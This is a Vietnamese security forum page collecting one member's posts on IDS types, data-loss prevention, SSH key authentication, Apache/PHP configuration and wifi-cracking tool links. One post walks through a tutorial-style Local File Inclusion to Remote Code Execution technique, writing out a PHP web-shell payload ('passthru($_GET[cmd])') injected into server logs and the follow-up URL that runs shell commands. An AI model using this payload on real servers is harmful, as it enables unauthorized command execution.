banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: antiadmin  XML
Profile for antiadmin Messages posted by antiadmin [ number of posts not being displayed on this page: 0 ]
 

angel_of_devil wrote:
Hình như bên MB là token bấm sinh mã smilie Trong các core banking hiện tại, core của Techcombank lởm nhất, chậm tệ hại, lại chỉ xài đc với IE 


Mình không biết Core banking làm những nhiệm vụ gì? Có những loại core banking nào?
Bạn mở tài khoản của ngân hàng nào rồi? Mình cũng đang muốn mở tài khoản mà không biết chọn ngân hàng nào, chỉ tìm hiểu có những dịch vụ nào thôi mà ko để ý đến hệ thống.
Mình thấy Techcombank cũng có nhiều người dùng mà.
Một ít thông tin nhé:

- Chỉ Snort là NIDS còn OSSEC và AIDE là HIDS
N là Network, như vậy Snort giám sát phát hiện tấn công từ Network, những tấn công gì thì xem trong rule của Snort
H là Host, OSSEC và AIDE giám sát tính toàn vẹn của hệ thống, phát hiện các tấn công trong nội bộ host đó như file, registry, tài khoản bị thêm, sửa, xoá. Policy bị xâm phạm, Ứng dụng bị thay đổi, giám sát bộ nhớ có dấu hiệu bị tràn không? có code chạy trên stack không? ..

Để thấy rõ hơn khác nhau và ưu, khuyết điểm thì tốt nhất là đọc kỹ document của từng cái, rồi cài đặt, cấu hình sử dụng hết đi. Như vậy mới hiểu rõ được.

regards,

zalman wrote:
Hiện tại mình đang có nhiệm vụ là bảo vệ tài liệu cho cty, nv đặt ra là cho user đọc nhưng ko copy về máy client được,mình nghiên cứu NTFS permison thì ko thể nào làm dc , đã cho read thì copy được. và ko copy dc thì cũng ko read được nốt. smilie

Sử dụng RMS server thì chỉ có thể phân quyền trên từng file ko cho copy được nội dung, nhưng cái này thí botay với thư mục. smilie

Vậy cho mình hỏi có giải pháp nào cho vấn đề này ko, chỉ đọc ko cho copy.hay là cái này ko thề thực hiện dc.

Cám ơn mọi người. smilie 


Bạn thử dùng DLP chưa?
Có đầy đủ các tính năng như bạn muốn, read được nhưng ko copy được, có thể cấm cả chụp màn hình.
Còn dùng máy ảnh chụp hoặc đọc rồi viết ra giấy thì đành chịu thôi smilie
Bổ xung thêm cuốn này nữa cho các anh em tham khảo




http://www.mediafire.com/?2odzzbm4dqy

Bạn nào đã đánh giá, triển khai mấy solution này rồi chia sẻ kinh nghiệm cho mọi người tham khảo với.
Nhỡ cái Referer # null hoặc bị thay bằng Referer hợp lệ nghĩa là vẫn vào được à?

gamma95 wrote:
lolz, tui đâu thấy bồ antiadmin bổ sung gì đâu ?? Seamoun để phpinfo() chỉ là PoC mà smilie 


smilie tùy bro nghĩ.
Với tui nó khác, vì mở ra thêm 1 hướng mới. Tôi nghĩ các bạn mới tìm hiểu cũng thấy vậy.
Nếu gamma95 có ý kiến gì hay thì cứ chia sẻ mọi người học hỏi lolz smilie
Thanks anh seamoun về những bài viết tổng hợp rất hay.

Em xin bổ xung thêm trong cách Khai thác sử dụng Log files
Chuyển từ Local File Inclusion sang Remote Code Execution

seamoun wrote:

d. Khai thác sử dụng Log Files
Chuyện gì sẽ xảy ra nếu chúng ta đệ trình với URL như sau
Code:
http://www.example1.com/index.php?page=<? echo phpinfo(); ?>

 

Thay vì sử dụng hàm phpinfo(), có thể sử dụng
Code:
<? passthru($_GET[cmd]) ?>

Khi đó file log sẽ có dạng
192.168.1.14 - - [15/Jul/2009:17:54:01 +0700] "GET /demo/index.php?page=<? passthru($_GET[cmd]) ?> HTTP/1.1" 200 492 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5"
 

Truy vấn đến log file theo URL:
Code:
http://example.com/demo/index.php?page=<đường dẫn đến file log>

Sẽ có thông báo lỗi:
Code:
Warning: passthru() [function.passthru]: Cannot execute a blank command in
/path/to/logfile.log on line xxx

Bây giờ có thể chạy lệnh như sau:
Code:
http://example.com/demo/index.php?page=.../path/to/logfile.log%00&cmd=ls -la

Như vậy đã chuyển sang RCE

@ tanviet12

tanviet12 wrote:
Mình mới tìm được cái video về RFI (Remove file include), bạn nào chưa hiểu lắm về RFI thì có thể xem 

RFI là Remote File Inclusion

@ giobuon

Tất nhiên là cả 2 cơ chế đều có thể dùng để xác thực. Nhưng cái gì để "trust" tốt hơn thì vẫn hơn.
Về logic thì cả 2 đều là thông tin và đều có thể mất trộm, còn xét tổng quát cả quá trình quản lý, phân phối mật khẩu, key, quá trình truyền thông tin, .. thì PKA vẫn an toàn hơn mật khẩu nhiều. Đấy là sự khác nhau giữa việc chọn cái gì để trust

1 - Không có mật khẩu nào dài bằng key smilie. Do vậy pass yếu có thể bị brute force còn key thì rất khó. Để đặt mật khẩu như key thì sẽ rất khó nhớ.
2 - Cơ chế làm việc của PKA cũng an toàn hơn cặp user/pass: user/pass phải được truyền qua network mỗi khi đăng nhập, nhưng PKA thì khác: trong trường hợp Client authentication, cặp key được lưu sẵn trên cả 2 máy, không có thông tin nhậy cảm nào được truyền qua mạng. Khó mất trộm hơn.
3 - Nếu kết hợp thêm passphrase thì còn an toàn hơn nữa, vì để vượt qua cơ chế này cần đẩy đủ cả 2 thông tin: key và passphrase: 1 cái lưu sẵn trong máy, 1 cái lưu trong đầu smilie

@ xNohat: Theo mình biết thì RSA 1024 bit đã bị phá vỡ. Key-lengh là 1024 bit chứ không phải cặp khóa Pub/Pri key được mã hóa tới 1024 bit?



SSH và SSL là 2 giao thức độc lập với nhau.
Còn service SSH đang trình bày ở đây là dịch vụ remote login sử dụng giao thức SSH. (Ngoài ra còn có SFTP, SCP, ..) Cụ thể ở đây sử dụng OpenSSH là một free tool cho phép thực hiện kết nối SSH.

2 giao thức này khá giống nhau ở việc mã hóa, kiểm tra toàn ven, xác thực.
Khác nhau: + SSH có nhiều cơ chế xác thực client hơn: public-key như ở trên, password và keyboard-interactive còn SSL chỉ sử dụng public-key

- đúng như bạn nói, MAC được sử dụng để kiểm tra tính toàn vẹn của dữ liệu được gửi đi, dùng các thuật toán hash, one way hashing, khó có khả năng dịch ngược.
MAC = hash(key, sequence_number, unencrypted_packet)
Một số thuật toán hash như SHA, MD5 được lựa chọn và thống nhất giữa Client - Server trong quá trình khởi tạo kết nối.

@ anh mrro: đây cũng là mục đích của em, ngoài tìm hiểu về service, cần hiểu rõ hơn về giao thức để từ đó xem nó mạnh yếu thế nào và tìm cách khắc phục.






Em chưa hiểu lắm câu hỏi của anh Conmale.


Nhưng theo em biết về dịch vụ SSH thì thế này:
Trường hợp Authentication phía server (Vì em thấy rất nhiều website đang để ssh như vậy):
1. Server cung cấp dịch vụ sshd, tự tạo ra một cặp key private/public.
2. Client request kết nối ssh đến server được Sever đẩy cho 1 public key (hoặc được copy, add bằng tay vào Client) chứa các thông tin định danh server.
3. Client kiểm tra và trusted public key này và sử dụng nó để mã hóa session key gửi lên.
4. Server sử dụng private key để giải mã lấy session key

Đây chính là bước kiểm soát authentication bằng cặp key trên. Không tính user/password.
Kiểm soát bằng việc trust hoặc không trust key được tạo ra.

Vấn đề em gặp phải ở đây là bất kỳ Client nào tạo request kết nối đến SSH server đều được Server đẩy cho public key của mình. Như vậy Client nào cũng có thể kết nối được đến Server miễn là chỉ cần user/password.

Vậy làm cách nào để Server kiểm tra Client đó có "trust" thật ko?. Để có user/pass cũng không kết nối được.

Theo em nghĩ phải có thêm bước ngược lại ở trên: Client tự tạo public và private key của mình, sau đó copy, add bằng tay lên server. Mỗi khi khởi tạo kết nối, client sẽ trình public key của mình ra cho server thấy nếu đúng thì mới tiếp tục các bước tiếp theo.
Có đúng vậy không anh?

@ xnohat: thank bài viết của bạn. Mình muốn biết khi bật tính năng đăng nhập ( xác thực ) bằng Public/Private Key cụ thể nó hay như thế nào?
Cho mình hỏi.
Nếu muốn authentication từ cả 2 phía Sever <=> Client. Phải cấu hình thế nào?
Khi đó quá trình bắt tay, chứng thực, mã hoá sẽ diễn ra như thế nào?

ngoungnguyen wrote:

Sau khi install Apache và PHP và MySQL xong (để cùng 1 thư mục trên ổ C là mysever , PHP được cài đặt như 1 module của apache ) em vào phần hệ thống của Apache mở file conf/httpd thì thấy PHP đã tự động được gọi vào apache
 


ngoungnguyen wrote:

1 PHPIniDir "C:/myserver/apache2.2/PHP/"
2 LoadModule php5_module "C:/myserver/apache2.2/PHP/php5apache2_2.dll"
 


ngoungnguyen wrote:

LoadModule php5_module "C:/myserver/php/php5apache2_2.dll"
AddType application/x-httpd-php .php
 


Bạn xem có phải sai đường dẫn đến file php5apache2_2.dll
Còn thằng Bliz
http://www.blitzgrp.com/ssl_certificates_vn.html

còn mấy link này nữa:
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#compatibility
http://www.aircrack-ng.org/doku.php?id=b43

Bộ tool crack wifi trong BT là từ trang này, rất chi tiết.
cảm ơn bạn nhé
Mình đang nghiên cứu về Penetration test. Bạn nào có tài liệu ECSA/LPT và các tài liệu liên quan cho mình xin với nhé.
Cảm ơn các bạn smilie
Bạn ơi cái link hư rồi.
Mình đang cần tài liệu về ECSA/LPT này lắm. Bạn có cho lại mình với nhé.

Cảm ơn bạn
 

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|